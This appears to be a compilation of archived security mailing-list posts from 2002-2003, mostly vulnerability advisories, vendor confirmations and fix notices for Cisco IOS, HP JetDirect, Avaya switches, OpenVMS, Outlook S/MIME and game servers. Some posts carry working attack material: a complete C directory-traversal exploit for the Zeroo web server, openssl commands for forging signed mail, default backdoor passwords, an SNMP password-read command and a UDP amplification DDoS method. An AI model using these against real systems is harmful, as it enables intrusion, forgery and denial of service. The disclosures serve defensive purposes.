> It is also different from the password vulnerability described in
> http://www.securityfocus.com/bid/3132
>
>
> It applies to the following situation:
>
> - Any operating system
>
> -HP Jetdirect cards JetDirect 300X, (J3263A), JetDirect EX Plus (J2591A),
> JetDirect 400N (J2552A, J2552B), JetDirect 600N (J3110A, J3111A, J3113A)
> and older.
>
> -The Jetdirect card is being managed from HP Web Jetadmin.
>
> -A Web Jetadmin "device password" had been set on the JetDirect card.
> (This password must be set from Web Jetadmin and has nothing to do with
> the Telnet password or the SNMP Set community name)
>
> In the above situation the Web Jetadmin device password is readable as
> plain ASCII tekst from the JetDirect card using SNMP.
>
>
> How to check your printers for this vulnerability:
>
> Use an SNMP toolkit to read the following OID from your printer:
> .iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-
> printer.generalDeviceStatus.gdPasswords
> (In numerical format: .1.3.6.1.4.1.11.2.3.9.1.1.13.0)
>
> An example on a Windows machine, using SNMPUTIL from the Windows Resource
> kit:
> C:\>snmputil get 131.155.120.118 public .1.3.6.1.4.1.11.2.3.9.1.1.13.0
> Variable = .iso.org.dod.internet.private.enterprises.11.2.3.9.1.1.13.0
> Value= String
> <0x41><0x42><0x43><0x44><0x55><0x56><0x3d><0x31><0x30><0x38><0
> x3b><0x00><0x00><0x00><0x00> ..etc...
>
> The resulting string reads in ASCII: ABCDEF=108;
> The Web Jetadmin device password is the word before the '=' sign, in this
> case: ABCDEF
>
>
> Ho

Re: Cisco IOS OSPF exploit

[Mike Caudill]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1



Cisco can confirm the statement made by FX from Phenoelit in his message 
"Cisco IOS OSPF exploit" posted on 2003-Feb-20. The OSPF implementation in 
certain Cisco IOS versions is vulnerable to a denial of service if it 
receives a flood of neighbor announcements in which more than 255 hosts 
try to establish a neighbor relationship per interface.


One workaround for this issue is to configure OSPF MD5 authentication.
This may be done per interface or per area.

Another possible workaround is to apply inbound access lists to explicitly 
allow certain OSPF neighbors only:

access-list 100 permit ospf host a.b.c.x host 224.0.0.5 
access-list 100 permit ospf host a.b.c.x host interface_ip  
access-list 100 permit ospf host a.b.c.y host 224.0.0.5 
access-list 100 permit ospf host a.b.c.y host interface_ip  
access-list 100 permit ospf host a.b.c.z host 224.0.0.5 
access-list 100 permit ospf host a.b.c.z host interface_ip  
access-list 100 permit ospf any host 224.0.0.6  
access-list 100 deny ospf any any   
access-list 100 permit ip any any   


Cisco IOS Versions 11.1 - 12.0 are subject to this vulnerability.
This bug has been resolved.  The following versions of Cisco IOS software
are the first fixed releases, meaning that any subsequent releases also 
contain the fix:

12.0(19)S
12.0(19)ST

12.1(1)
12.1(1)DB
12.1(1)DC
12.1(1)T


We would like to thank FX for his continued cooperation with us in the 
spirit of responsible disclosure and working to increase awareness of 
security issues.

For information on working with the Cisco PSIRT regarding potential security
issues, please see our contact information at 

http://www.cisco.com/warp/public/707/sec_incident_response.shtml#Problems

Thank you,

- -Mike-


> Hi there,
>
> attached you may find the exploit for the Cisco IOS bug ID CSCdp58462. The bug
> is long fixed, so if you still run OSPF on a old version of IOS, now is a good
> time to give your routers some attention.
>
> FX 
>
> -- 
>  FX   <[EMAIL PROTECTED]>
>   Phenoelit   (http://www.phenoelit.de)
> 672D 64B2 DE42 FCF7 8A5E E43B C0C1 A242 6D63 B564
>
> /* Cisco IOS IO memory exploit prove of concept 
>  * by FX of Phenoelit <[EMAIL PROTECTED]>
>  * http://www.phenoelit.de
>  *
>  * For: 
>  *19C3 Chaos Communication Congress 2002 / Berlin
>  *BlackHat Briefings Seattle 2003
>  * 
>  * Cisco IOS 11.2.x to 12.0.x OSPF neighbor overflow
>  * Cisco Bug CSCdp58462 causes more than 255 OSPF neighbors to overflow a IO memory
>  * structure (small buffer header). The attached program is a PoC to exploit 
>  * this vulnerability by executing "shell code" on the router and write the 
>  * attached configuration into NVRAM to basicaly own the router. 
>  *

- -- 
- 
|  ||||   | Mike Caudill  | [EMAIL PROTECTED] |
|  ||||   | PSIRT Incident Manager| 919.392.2855   |
|     | DSS PGP: 0xEBBD5271   | 919.522.4931 (cell)|
| ..:||:..:||:..  | RSA PGP: 0xF482F607   -|
| C i s c o S y s t e m s | http://www.cisco.com/go/psirt  |
- 

-BEGIN PGP SIGNATURE-
Version: PGP 6.5.2

iQA/AwUBPlaoLYpjyUnrvVJxEQLcZgCgxAkatIdM5EjV4uMcDgJqd/aFx9EAoPbm
Sw0/fZvhc3uuv0NnuBwfSWnw
=McnI
-END PGP SIGNATURE-

RTS CryptoBuddy Multiple Encryption Implementation Vulnerabilities

[Mike]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

RTS CryptoBuddy Multiple Encryption Implementation Vulnerabilities

__
 Advisory Information
__

Severity: High Risk

Vendor:   Research Triangle Software, Inc.
Homepage: http://www.rtsz.com/ 

Advisory reported to vendor:  February 2, 2003

Author:   Michael Whitehead, CISSP 
Author Contact:   [EMAIL PROTECTED]  

__
 Vulnerability Summary
__
The software has multiple vulnerabilities related to the implementation of
its passphrase and general encryption techniques.  The easiest to exploit 
is through use of a symmetric key injection attack.  An attacker can use 
the software to encrypt a dummy file with a passphrase of his or her 
choosing.  The resulting secret key can then be inserted into any other 
file that has been encrypted with the software.  The resulting file may 
then be decrypted using the software and the attacker's previously 
selected passphrase.  Details of this and other vulnerabilities can be 
found at the end of this advisory.

__
 Solution
__
There is no recommended solution at this time.  The vendor was very
responsive to this advisory and provided additional information to further
develop this advisory.  Vendor has indicated that the issues identified in
this advisory will be mitigated in the next version of the software.

__
 Product Description
__
This shareware product would be generally classified as a "security & 
encryption" file utility.

A description provided on one of the many shareware sites:

"CryptoBuddy(TM) (www.cryptobuddy.com) is an easy-to-use encryption 
program that allows individuals and corporations to effectively protect 
and encrypt their files and data. As the Internet increasingly becomes an
unsafe medium for transporting confidential information, CryptoBuddy 
enables you to take any file and quickly encrypt and compress it."

__
 Affected Versions
__

CryptoBuddy 1.2 and earlier versions.

O/S Notes: software is only available for Windows (Win95/98/ME/NT/2000/XP)

__
 Solution 
__

The use of this software should be determined relative to the risk. 

__
 Advisory Detail
__

PREFACE:
The software is intended to "effectively protect and encrypt" files.  As 
such, it DOES encrypt files.  The EFFECTIVENESS of the method used is key
to this advisory.  Since this product's primary purpose is to be used as 
a data encryption system, it is imperative that users of the software are 
fully aware of limitations in its effectiveness at protecting their data.  

==
Item 1:
 Vulnerability-- Predictable File Schema; Secret key stored, not used to 
 encrypt data
 Threat--Unknown secret key can be replaced with known secret key
 Exposure--  Attacker can decrypt any encrypted file created by any 
 user of this program
 Attack--"Symmetric key injection" (see Note below).
 Tools-- hex editor, CryptoBuddy; exploit could be easily scripted
 Severity -- High
 
 Note-- I am using the term "Symmetric key injection attack" as I was 
unable to find another term for this technique.

 Description-- A passphrase provided by the user is simply encrypted and 
 stored with the resulting ciphertext and is not actually used to encrypt 
 the plaintext.  It is stored in a predictable location (fixed-length, 
 reserved block) in the resulting ciphertext file (offset 120:15A). Since 
 the key is not used to encrypt the plaintext, the attacker can simply 
 encrypt an empty file, copy block 120:15A from the resulting encrypted 
 file, and replace the same block in ANY target file.  The target file can
 then be simply decrypted using the attacker's passphrase (and the 
 CryptoBuddy software).  Payload ciphertext is always appended t

PivX Multi-Vendor Game Server dDoS Advisory

[Mike Kristovich]

Mike Kristovich, PivX Security Advisory MK#001

Date:November 26, 2002

Released:January 16, 2002

Application: Battlefield 1942 (Server and Dedicated Server)
 America's Army
 Unreal Tournament 2003
 and more.. see section 2.

Version: All up to current.

Bug: Server status port replies to spoofed UDP packets
 with large amount of data.

Risk:High, BF1942 servers flooded or used as flooders, DDoS risk

Author:  Mike Kristovich, Security Researcher, PivX Solutions, LLC
 e-mail: [EMAIL PROTECTED]

Web: http://www.PivX.com/kristovich



Sections:

1) Introduction
2) Bug
3) Proof of concept code.
4) Fix
5) Philosophy
6) Closing comments..
7) Related Documents and Advisories
8) DDoS Related Quotes
9) Contact


__


1) Introduction

This document is based on Battlefield 1942's query responses, but
this vulnerability exists in many games.  As a basic rule of thumb,
if it supports gamespy (http://www.gamespy.com), it will likely be 
vulnerable.

The following games are vulnerable to the same type of attack, and
most use the same general query commands (excluding Quake, Quake 2,
Return to Castle Wolfenstein, and a couple others).  The other query
commands can be found in the source of a free program called "Server
Query" (http://www.ServerQuery.com).  The general rule of thumb is:
If its supported by GameSpy and Server Query, its vulnerable.

Affected Games
--

Quake   Quake 2 Q3: Arena & Team Arena
Kingpin Half-Life   Counter-Strike
Sin Soldier of Fortune  Daikatana
Unreal Tourn.   Quakeworld  Unreal
RuneGoreTribes
Tribes 2Serious Sam Serious Sam 2
C&C: Renegade   Global Operations   Jedi Knight 2

Battlefield 1942
America's Army
Unreal Tournament 2003
Return to Castle Wolfenstein 
Medal of Honour: Allied Assault
SoF2: Double Helix
SoF2: Double Helix Demo
Alien vs Predator 2
NeverWinter Nights
V8 Supercar Challenge

-

The usage example for Battlefield 1942 follows..

The risk for this vulnerability seems to be worse on a game such
as Battlefield 1942 due to its ability for  to support 64 player 
servers.

Battlefield 1942 servers listen on UDP port 23000, awaiting commands:
i.e. '\status\' '\players\' '\packets\' '\echo\' '\rules\', and more.

The server uses a protocol very similar to UT2003 and America's Army,
and many other GameSpy* supported games.  

* Gamespy is a popular program that allows game clients to find and
  connect to game servers.

BF1942 allows you to combine requests:
i.e. '\status\players\packets\rules\'

When a request like the example above is sent, it uses approximately
30 bytes, not including UDP overhead.  The resulting response
can be anywhere from as low as 6000 - 7000, to as high as 11,000+ 
bytes.  Using an example of 30 bytes:11,799 bytes, we get a ratio of
1:393. Basically, for every 1 byte we've sent, 393 are returned (in this 
particular example, which comes from a server housing 41 players)..
Results will vary.  A server which holds 64 players could potentially
respond with well over 18,000 bytes.

A server housing 31 players, in our test, responded with 9,583 bytes
for a single 30 byte request. 

Side note, one single UDP request using the query line in our POC code
responds with 10 seperate responses (due to packet size limitations.)
This also means, if the victim port is unreachable, the victim will 
respond to the data with 10 ICMP Unreachable responses.

__


2) Bug

UDP is a connectionless protocol of which the source ip and port can 
easily be spoofed.  If you've read the introduction, you can probably
see where I'm going with this.

The BF1942 status port will reply an amazing amount of requests,
and although I have only personally tested this to 50 kbytes/sec, I
dont see any reason why you couldn't go even higher.

When these requests are received, the reply is sent to the source host
which, in this case, we have spoofed.  This causes a huge packet flood
to your victim, therefore you now have your DoS.

When tested, a single upstream of 4 k/s to the BF1942 server yielded
over 550 k/s being sent to the victim host.  When the victim's host
receives these packets on a UDP port which is open (commonly found
to be 135 (MS/DCE RPC), 53 (DNS), and so on), the downstr

RE: Foundstone Research Labs Advisory - Multiple Exploitable Buffer Overflows in Winamp (fwd)

[Shutters, Mike]

I went ahead and installed the latest 2.81, even though it was dated as you
said.  After the install I found a file in the Plugins directory named
IN_MP3.DLL, which is 132K in size and dated December 16, 2002, 1:55 PM.
Perhaps this is the file which created the fix.  Unfortunately, I didn't
check the directory contents prior to updating from 2.80.

Mike

> -Original Message-
> From: David Howe [SMTP:[EMAIL PROTECTED]]
> Sent: Thursday, December 19, 2002 9:49 AM
> To:   Email List: BugTraq
> Subject:  Re: Foundstone Research Labs Advisory - Multiple Exploitable
> Buffer Overflows in Winamp (fwd)
> 
> at Thursday, December 19, 2002 12:31 AM, Dave Ahmad
> <[EMAIL PROTECTED]> was seen to say:
> > Solution:
> > For Winamp 2.81 users
> > We recommend either upgrading to Winamp 3.0 or redownloading Winamp
> > 2.81 (which has since been fixed) from: http://www.winamp.com
> Does anyone have a more direct URL or a MD5 hash of the "safe" file? the
> current download of 2.81 is still dated Aug 21 and the current 3.0 dated
> 8 Aug (on the site - haven't downloaded 3.0. but the internal date on
> 2.81 is definitely the 21st)
> There is also *nothing* about this on the winamp site - its as if it
> didn't exist.
> 

RE: Password Hole Found In Webshots - (Webshots Confirmed)

[Shutters, Mike]

>From Webshots (confirmed):

-Original Message-
From:   [EMAIL PROTECTED] [SMTP:[EMAIL PROTECTED]]
Sent:   Wednesday, December 18, 2002 9:33 AM
To: Shutters, Mike
Subject:Re: Password Hole Found In Webshots [T200212130039]

Hello Mike,

Thank you for contacting Webshots!

Unfortunately the password protection feature within our software is not
very reliable, our engineers are working on improving this feature for our
software.  We suggest that you use the password protection within your
operating system.  I apologize for the inconvenience.

Sincerely,

Belynda
__
Customer Support Representative, www.webshots.com

Please include all prior messages in any responses


> -Original Message-
> From: Brian Carpenter [SMTP:[EMAIL PROTECTED]]
> Sent: Thursday, December 12, 2002 10:33 AM
> To:   [EMAIL PROTECTED]
> Subject:  Password Hole Found In Webshots
> 
>   I have descovered a hole in the webshots screensave program. On
> either
> a Win2K or xp machine that has it installed you can bypass the password
> on the screen saver by pressing Ctrl+Alt+Del wich brings up the Windows
> box that contains logout lockcomputer shutdown ect: Then you will hit
> cancel and boom you are at the desktop with all the permisions the
> previous user had. If you have windows password locking the screen saver
> you are able to  Ctrl+Alt+Del and then go to taskmanger and end the
> screen saver thus bringing you back to the desktop.
> 
>   This works with both webshots password set up and the windows
> password
> setup on the computer. As long as webshots is used the hole is there. 

Zeroo Webserver remote directory traversal exploit

[Mike Cramp]

Hey guys,

A while back there was that directory traversal exploit for the Zeroo
webserver. (http://lonerunner.cfxweb.net)

Here is a proof of concept code, enjoy.

/*
 * zeroo httpd remote directory traversal exploit
 * proof of concept
 *  hehe, just a copy and paste from my other directory
 *  traversal exploit ;p
 * [mikecc] [http://uc.zemos.net/]
*/

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define FOO "../"

void get(int sd);

int main(int argc, char **argv)
{
struct sockaddr_in sock;
struct hostent *pHe;
int sd;
int amt;
char * host;
char * file;
short port;
char expstr[1024];
int x;
char * baz;

printf("UC-zeroo\n");
printf("zeroo httpd remote exploit\n");
printf("[mikecc/unixclan] [http://uc.zemos.net/]\n\n";);
if (argc != 5)
{
printf("%s host port file traverse_amount (>= 1 [keep incrementing 
till hit])\n",argv[0]);
return 0;
}
host = argv[1];
port = atoi(argv[2]);
file = argv[3];
amt = atoi(argv[4]);
if ((pHe = gethostbyname(host)) == NULL)
{
printf("Host lookup error.\n");
return 0;
}
if ((sd = socket(AF_INET,SOCK_STREAM,0)) == -1)
{
printf("sock() failed.\n");
return 0;
}
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
memcpy(&sock.sin_addr.s_addr,pHe->h_addr,pHe->h_length);
printf("Connecting...\n");
if ((connect(sd,(struct sockaddr *)&sock,sizeof(sock))) == -1)
{
printf("Failed to connect to %s.\n",host);
return 0;
}
printf("Setting up exploit string..\n");
if ((amt + 8 + strlen(file)) > 1024)
{
printf("Error. Limit 1024 characters.\n");
return 0;
}
sprintf(expstr,"GET /");
for (x = 0; x < amt; x++)
{
strcat(expstr,FOO);
}
printf("\tInserting file string..\n");
strcat(expstr,file);
strcat(expstr,"\n\n");
printf("Sending exploit string...\n");
write(sd,expstr,strlen(expstr));
get(sd);
close(sd);
return 0;
}

void get(int sd)
{
char buf[1024];
int x;
fd_set rset;

FD_ZERO(&rset);
while (1)
{
FD_SET(sd,&rset);
select(sd+1,&rset,0,0,0);
if (FD_ISSET(sd,&rset))
{
if ((x = read(sd,buf,1024)) == 0)
{
printf("Connection closed by foreign host.\n");
exit(1);
}
buf[x] = 0; /* clean out junk */
printf("%s\n",buf);
}
}
}


---
mikecc ([EMAIL PROTECTED])
grep mikecc /etc/passwd|cut -d":" -f5|sed s/,,,//

Re: Undocumented account vulnerability in Avaya P550R/P580/P880/P882switches

[Mike Scher]

In response to tbe below, we examined this issue on a Cajun P550 (not
550R) with software version 4.3.5.

We found:

1) The accounts (manuf and diag) are clearly present in the config and
easily seen with 'show running-conf' or 'show startup-conf'
2) They are system accounts and cannot be deleted
3) They have by default the passwords indicated by Mr. Lipkowski
4) They CAN have their passwords changed by the 'root user' and the
changes save sucessfully across reloads.

We'd ask that others verify (for other software/hardware combinations)
whether they can change the account passwords ( 'username manuf password
foo' ), and save them ( 'copy running-config startup-config' ), reload,
and check whether the passwords changes have saved.

As an aside:

While testing, we noticed that accounts with the same password show the
same saved hash, indicating that only one salt is in use.  That may be a
legacy item on the P550, which is discontinued and stuck at 4.3.5 version
software.

We'd ask others to check whether this (minor, but nevertheless real) issue
is present in newer revisions as well.

  -Mike

-- 
Michael Scher | Director, Neohapsis Labs
[EMAIL PROTECTED]  | General Counsel

On Tue, 15 Oct 2002, Jacek Lipkowski wrote:

> Undocumented account vulnerability in Avaya P550R/P580/P880/P882 switches
>
> 1. Problem Description
>
> Two undocummented accounts with default passwords allow access via telnet
> and the web interface to Cajun P550R/P580/P880/P882 switches. Both
> accounts give developer access to the switch. The vulnerability can be
> avioded by upgrading to software version 5.3.0 or later and disabling the
> accounts.
>
> 2. Tested systems
>
> The following versions were tested and found vulnerable:
>
> Avaya Cajun P580 software version 5.2.14
>
> All previous software versions are assumed to be vulnerable. This
> problem is present in P550R,P580,P880 and P882.
>
> 3. Details
>
> The vulnerable firmware installs the following strings into the switch
> configuration by default:
>
> username "root" password encrypted-type1 "$tSfIcnbTP.pxRf7BrhGW31"
> access-type admin
> username "diag" password encrypted-type1 "$PQO.vGxkvDHkEDCJ2YsoD1"
> access-type read-write
> username "manuf" password encrypted-type1 "$seHFLP9b16m2v/534WCk90"
> access-type read-write
>
> The only documented password is for the root user. This user can't
> change the diag and manuf accounts.
>
> The un-documented passwords are:
>
> user  password
>   
> diag  danger
> manuf xxyyzz
>
> Both of these accounts give developer access to the switch (read-write
> access-type), which is more priviliged than normal administrative access
> (admin access-type).
>
> 4. Recommendations
>
> As always it is good administrative practice to block access to
> administrative interfaces (telnet, web) at the firewall. Upgrading to
> software version 5.3.0 or later and disabling the accounts resolves ths
> issue.
>
> As a temporary workaround download the configuration file via tftp, edit
> out these accounts, or change their password hashes, and upload it to the
> switch.
>
>
> 5. Vendor status
>
> AVAYA was informed on 2 Oct 2002. The vendor responded the same day, proved
> responsive and worked promptly on the problem. I have agreed to release the
> information after the release of the official AVAYA advisory. The official
> Avaya advisory was out on 11 Oct 2002. The fixed software is avaliable from the
> Avaya support site http://support.avaya.com.
>
> Official AVAYA security advisories are located at
> http://support.avaya.com/security/
>
> 6. Disclaimer
>
> Neither I nor my employer is responsible for the use or misuse of
> information in this advisory.  The opinions expressed are my own and not
> of any company.  Any use of the information is at the user's own risk.
>
>
> Jacek Lipkowski [EMAIL PROTECTED]
>
> Andra Co. Ltd.
> ul Wynalazek 6
> 02-677 Warsaw, Poland
> http://www.andra.com.pl
>
>
>

Re: Kill a Unisys Clearpath with nmap port scan

[Mike Shaw]

At 03:57 PM 10/2/2002 -0500, Jonathan G. Lampe wrote:
>Unisys "Clearpath" mainframes are very sensitive to the probes of nmap and 
>similar programs.  Basically, by only port-scanning (not even 
>fingerprinting), you can cause the entire machine to seize up.  (Yes, the 
>whole machine...not just a job or the TCP/IP device.)
>
>The problem may be occurring because the host fires up a job to log each 
>incomplete TCP handshake - other people have suggested a problem with the 
>TCP/IP stack on the iron, but I really don't know for sure.

Wow, and I thought I was the only one who experienced this.   I ran a quick 
Superscan (Foundstone) against a Clearpath subnet one time, and within an 
hour was contacted by the admin for a "possible security issue".  This was 
about the 4th time I had port scanned that network, only this time one of 
the operations folks had notices a huge spike in resource utilization.

The problem I observed was that the system seems to run something like 
inetd in which it fires up a process when something connects to the port, 
instead of running network processes in a daemon mode.  The spike happened 
because so many services were configured, and all the ports were hit within 
a few seconds.  This caused what I call a "hunka hunka burnin' processes" 
to fire up all at once.  Depending on the size and configuration of the box 
you could easily max out system resources, and crash the box.  Maybe some 
Clearpath experts can comment on this?

Of course the admin's response was "new rule, no portscanning."  My 
response was "secure your box".

 From what I've seen, most Clearpath admins don't do much locking down on 
those boxes, because "mainframes are secure".   If you want to see some 
really scary stuff, start poking around SNMP and see what information you 
can get ; )

-Mike

Re: Cisco Secure Content Accelerator vulnerable to SSL worm

[Mike Caudill]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1



We can confirm the finding made by Matt Zimmerman <[EMAIL PROTECTED]> for all 
older releases of the Cisco Secure Content Accelerator software.

Cisco has released version 3.2.0.20 of Cisco Secure Content Accelerator 
software on September 27, 2002 which resolves the OpenSSL issue.

The new version of software is available to customers via our website at 

http://www.cisco.com/cgi-bin/tablebuild.pl/cs-conacc

This problem has been documented in the Release-notes for version 3.2.0.20
online at:


http://www.cisco.com/univercd/cc/td/doc/product/webscale/css/css_sca/sca_320/v320b20.htm#xtocid13


- -Mike-



> Product : Cisco SCA 11000 Series Secure Content Accelerator
> Product URL : http://www.cisco.com/warp/customer/cc/pd/cxsr/ps2083/
> CVE : CAN-2002-0656
> Software release: All current releases
> Vendor status   : PSIRT and TAC notified 2002/09/17, last update 2002/09/24
> Patch status: No patch available

> Attempts to exploit the vulnerability described in CAN-2002-0656 cause the
> SCA 11000 (all tested software releases) to spontaneously reboot, resulting
> in at least a denial of service.  This product incorporates code from an
> older OpenSSL release, and thus shares the same vulnerability.  There is no
> known means to work around this issue, short of disabling SSL services on
> the system.

> Cisco's Secure Content Accelerator is closely related to SonicWall's SSL
> offloader product.  The SonicWall product was also vulnerable, and a
> statement and fix were issued promptly:

> http://www.sonicwall.com/support/security_advisories/security_advisory-openSSL.html

> No official fix is as yet available from Cisco for this issue, and no
> advisory has been released.  Impact is likely equivalent to impact on the
> SonicWall product.

> Cisco PSIRT publishes advisories here:

> http://www.cisco.com/warp/public/707/advisory.html

> -- 
>  - mdz

- -- 
- 
|  ||||   | Mike Caudill  | [EMAIL PROTECTED] |
|  ||||   | PSIRT Incident Manager| 919.392.2855   |
|     | DSS PGP: 0xEBBD5271   | 919.522.4931 (cell)|
| ..:||:..:||:..  | RSA PGP: 0xF482F607   -|
| C i s c o S y s t e m s | http://www.cisco.com/go/psirt  |
- 

-BEGIN PGP SIGNATURE-
Version: PGP 6.5.2

iQA/AwUBPZ3+GYpjyUnrvVJxEQIlbQCeP9Ce2M7rpVgGncXa67XLyUcFzNoAoN5p
8V8uMFPZKxJ10sHmkzOceYc9
=qOdy
-END PGP SIGNATURE-

OpenVMS POP server local vulnerability

[Mike Riley]

Akita Security Advisory 27/09/2002
OpenVMS UCX$POP_SERVER.EXE vulnerability

Advisory:
http://www.akita-security.co.uk/VMS/ucx_pop_server.txt

VMS security tool
http://www.akita-security.co.uk/stoat


Overview


UCX is the main TCP/IP stack for OpenVMS.  Akita Security have
discovered a vulnerability in every version of the UCX pop
server which allows a local user to overwrite any file on the
system with a 0 byte file.

Due to the popularity of UCX this problem will be widespread
amongst OpenVMS installations.

This issue was discovered as part of wider research into OpenVMS
security.  Many issues have been found, and further advisories
will be released shortly.

Detail
==

The UCX pop server binary, SYS$SYSTEM:UCX$POP_SERVER.EXE, is
installed with the VMS privileges BYPASS and SYSPRV:

INSTALL> list ucx$pop_server.exe /full

DISK$OPENVMS071:.EXE
   UCX$POP_SERVER;1   Prv
Entry access count = 1
Privileges = SYSPRV BYPASS

INSTALL>

The BYPASS privilege allows the pop server to override filesystem
permissions.  By use of the -logfile commandline switch, it is
possible to persuade the server to open a file anywhere, or to
truncate an existing file, as follows:



$ show process/privs

25-SEP-2002 10:47:35.02   User: MIKE Process ID:
013F
  Node: VAX  Process name:
"_TNA21:_1"

Authorized privileges:
 NETMBXTMPMBX

Process privileges:
 NETMBX   may create network device
 TMPMBX   may create temporary mailbox

Process rights:
 INTERACTIVE
 REMOTE

System rights:
 SYS$NODE_VAX
$
$ break_it :== $sys$system:ucx$pop_server.exe
$ break_it -logfile sys$system:I_SHOULDNT_BE_ABLE_TO_WRITE_HERE
19102-09-24 17:41:39 sizeof(block_wait_times) 160
19102-09-24 17:41:40 sizeof(struct vms_time_rec) 32
19102-09-24 17:41:40 num_elems 5
[SNIP]
^C
$ dir/prot sys$system:I_*

Directory SYS$SYSROOT:[SYSEXE]

I_SHOULDNT_BE_ABLE_TO_WRITE_HERE.;1
   insufficient privilege or object protection
violation

Total of 1 file.
$


The file created looks like this:


Directory SYS$SYSROOT:[SYSEXE]

I_SHOULDNT_BE_ABLE_TO_WRITE_HERE.;1   File ID:  (9499,485,0)
Size:0/0  Owner:[SYSTEM]
Created:   24-SEP-2002 17:41:41.14
Revised:   24-SEP-2002 17:41:57.09 (1)
Expires:   
Backup:
Effective: 
Recording: 
File organization:  Sequential
Shelved state:  Online
File attributes:Allocation: 0, Extend: 0, Global buffer count: 0
No version limit
Record format:  Stream_LF, maximum 0 bytes, longest 32767 bytes
Record attributes:  Carriage return carriage control
RMS attributes: None
Journaling enabled: None
File protection:System:RWED, Owner:RWED, Group:RE, World:
Access Cntrl List:  None

Total of 1 file, 0/0 blocks.
$


Severity


At the least, this bug could be used by a local user to destroy an
OpenVMS installation, or overwrite logfiles.  If a local user could
control the log output of the pop server it could probably be used
to gain full privileges, although this is speculation on our part.


Workaround
==

Remove world execute permissions for the pop server binary.

Vendor status
=

Akita Security informed Compaq of this vulnerability on 14/06/2002.
Compaq have released an ECO which corrects the problem:


ECO B 1-JUL-2002 Alpha and VAX

Problem:

Disable the "-logfile" command line switch, which is not needed on
OpenVMS.

Deliverables:

TCPIP$POP_SERVER.EXE V5.3-18B

Reference:

Internal testing.


Please note the lack of reference to a security problem, and the
lack of credit to Akita Security.  Internal testing ?

Credit
==

This issue was discovered by [EMAIL PROTECTED]



--
Mike Riley - Security Systems manager @ Akita
http://www.akita-security.co.uk

Sales: T:+44(0)1869 320111 F: +44(0)1869250688 E: [EMAIL PROTECTED]
Tech: T: +44(0)1869 320111 E: [EMAIL PROTECTED]

"Security, performance, cost - pick two"

Outlook S/MIME Vulnerability

[Mike Benham]

===
Outlook S/MIME Vulnerability 09/02/02
Mike Benham <[EMAIL PROTECTED]>
http://www.thoughtcrime.org

===
Abstract

Outlook's S/MIME implementation is vulnerable to the certificate chain
spoofing attack, despite Microsoft's claim that IE is the only affected
application.  The vulnerability allows anyone to forge the digital
signature on an email that is to be viewed with Outlook.  No warnings are
given, no dialogs are shown.


Description

For a complete description of the certificate chain attack, see:
http://online.securityfocus.com/archive/1/286290

As with the IE SSL vulnerability, an attacker generates a bad certificate
chain:

[Issuer:VeriSign | Subject:VeriSign]
>[Issuer:VeriSign | Subject:www.thoughtcrime.org]
 >[Issuer:www.thoughtcrime.org | Subject:Bill [EMAIL PROTECTED]]

Outlook fails to check the Basic Constraints on the intermediate
certificate and accepts the leaf certificate as valid.

=
Severity

As it stands, there is virtually no difference between signed and unsigned
email in Outlook.  Unless carefully inspected, signed email in Outlook is
essentially meaningless.  This also applies to any signed email received
over the past 5+ years.

Prudent users who must continue using Outlook for signed email should
manually inspect and verify received certificate chains.


Affected Clients

Mozilla is NOT vulnerable.

Outlook Express 5 is vulnerable.
(Tested on fully patched Win2k SP3 system)


Exploit

1) Put a valid CA-signed certificate and private key in a file
"middle.pem"

(If you don't have a valid CA-signed certificate, there's one bundled with
sslsniff: http://www.thoughtcrime.org/ie.html)

2) Generate a fake leaf certificate signing request:

  a) openssl genrsa -out key.pem 1024
  b) openssl req -new -key key.pem -out leaf.csr

3) Sign the CSR with your "intermediate" certificate:

  a) openssl x509 -req -in leaf.csr -CA middle.pem -CAkey middle.pem
-CAcreateserial -out leaf.pem

4) Sign a spoofed mail message:

  a) openssl smime -sign -in mail.txt -text -out mail.msg -signer leaf.pem
-inkey key.pem -certfile middle.pem -from [EMAIL PROTECTED] -to
[EMAIL PROTECTED] -subject "SM Exploit"

5) Send the mail:

  a) cat mail.msg | sendmail [EMAIL PROTECTED]

I encourage everyone to send Bill Gates an email from himself.  =)

==
Vendor Notification Status

Microsoft knows about this, of course, but "isn't even sure whether to
call this a 'vulnerability'."  Right.

- Mike

--
http://www.thoughtcrime.org

IE SSL Exploit

[Mike Benham]

This is a follow-up to my previous advisory:
http://online.securityfocus.com/archive/1/286290/2002-07-31/2002-08-06/0

Thanks to everyone who helped verify the vulnerability.

I've written a small tool (sslsniff) that demonstrates the severity of
this vulnerability in a real-world setting.  It performs undetected
hijacking/sniffing of IE SSL sessions, even on a switched network.

It can be found at http://www.thoughtcrime.org/ie.html

Still no word from Microsoft.

- Mike

--
http://www.thoughtcrime.org

RE: EEYE: Macromedia Shockwave Flash Malformed Header Overflow

[Mike Chambers]

The linux and solaris updates will be avaliable later today.

You will be able to download it at:
www.macromedia.com/go/getflashplayer/ 

mike chambers

[EMAIL PROTECTED]

> -Original Message-
> From: Scott Lampert [mailto:[EMAIL PROTECTED]] 
> Sent: Friday, August 09, 2002 3:45 PM
> To: BUGTRAQ
> Subject: Re: EEYE: Macromedia Shockwave Flash Malformed 
> Header Overflow
> 
> 
> On Thu, Aug 08, 2002 at 05:26:20PM -0700, Marc Maiffret wrote:
> > Vendor Status:
> > Macromedia has released a patch for this vulnerability, 
> available at:
> > 
> http://www.macromedia.com/v1/handlers/index.cfm?ID=23293&Metho
d=Full&Title=M
>
PSB02%2D09%20%2D%20Macromedia%20Flash%20Malformed%20Header%20Vulnerabili
ty%2
> 0Issue&Cache=False
> 
> Discovery: Drew Copley
> Exploitation: Riley Hassell
> 

As far as I can see there is no update to the UNIX versions.  The files
are all dated March 25.  The bulletin describes version 6 of the Flash
player as the fix, however that doesn't seem to be available for
anything other than Windows and Mac.  Am I missing something?
-Scott

-- 
Scott Lampert
<[EMAIL PROTECTED]>
"They that can give up essential liberty to obtain a little temporary
safety deserve neither liberty nor safety."
-Benjamin Franklin, 1759

Public Key: http://www.lampert.org/public_key.asc

Re: IE SSL Vulnerability

[Mike Benham]

On Wed, 7 Aug 2002, Alex Loots wrote:
> Hi Mike,
> I visited your demo at https://www.thoughtcrime.org. It appears that Thawte is
> the TTP instead of Verisign. Does this make any difference for example the
> certificate extensions?

First of all, https://www.thoughtcrime.org is NOT the demo site.  Several
